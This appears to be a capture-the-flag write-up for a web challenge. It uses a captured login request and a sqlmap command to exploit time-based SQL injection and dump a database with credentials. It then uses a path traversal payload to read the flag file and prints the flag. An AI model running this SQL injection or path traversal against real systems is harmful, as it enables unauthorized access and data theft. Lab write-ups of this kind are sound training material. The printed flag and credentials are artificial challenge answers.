![Pasted image 20230323204400.png](../assets/Pasted%20image%2020230323204400.png)

![Pasted image 20230323204449.png](../assets/Pasted%20image%2020230323204449.png)

![Pasted image 20230323213518.png](../assets/Pasted%20image%2020230323213518.png)

using sqlmap, Found timebased SQLi in `username` parameter

request.txt

````python
POST http://64.227.41.83:30772/api/login HTTP/1.1
Host: 64.227.41.83:30772
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://64.227.41.83:30772/
Content-Type: application/json
Origin: http://64.227.41.83:30772
Content-Length: 37
Connection: close

{"username":"admin","password":"admin"}
````

````css
sqlmap -r request.txt --random-agent
````

database name `orbital`

found two tables `users` and `communication`

![Pasted image 20230324131030.png](../assets/Pasted%20image%2020230324131030.png)

`admin:ichliebedich`

![Pasted image 20230323204836.png](../assets/Pasted%20image%2020230323204836.png)

![Pasted image 20230323205037.png](../assets/Pasted%20image%2020230323205037.png)

From docker file i found filename containing our flag

![Pasted image 20230323205151.png](../assets/Pasted%20image%2020230323205151.png)

Flag location: `/signal_sleuth_firmware`

In `routes.py` from the source code, I found that file is being sent directly and there is also a hint given in the comment.

![Pasted image 20230323205405.png](../assets/Pasted%20image%2020230323205405.png)

By google search I found flask Path Traversal vulnerebility and it's payload from this article
https://huntr.dev/bounties/7acac778-5ba4-4f02-99e2-e4e17a81e600/

````c
/../../../../../../../../../signal_sleuth_firmware
````

![Pasted image 20230321191054.png](../assets/Pasted%20image%2020230321191054.png)

Flag: `HTB{T1m3_b4$3d_$ql1_4r3_fun!!!}`
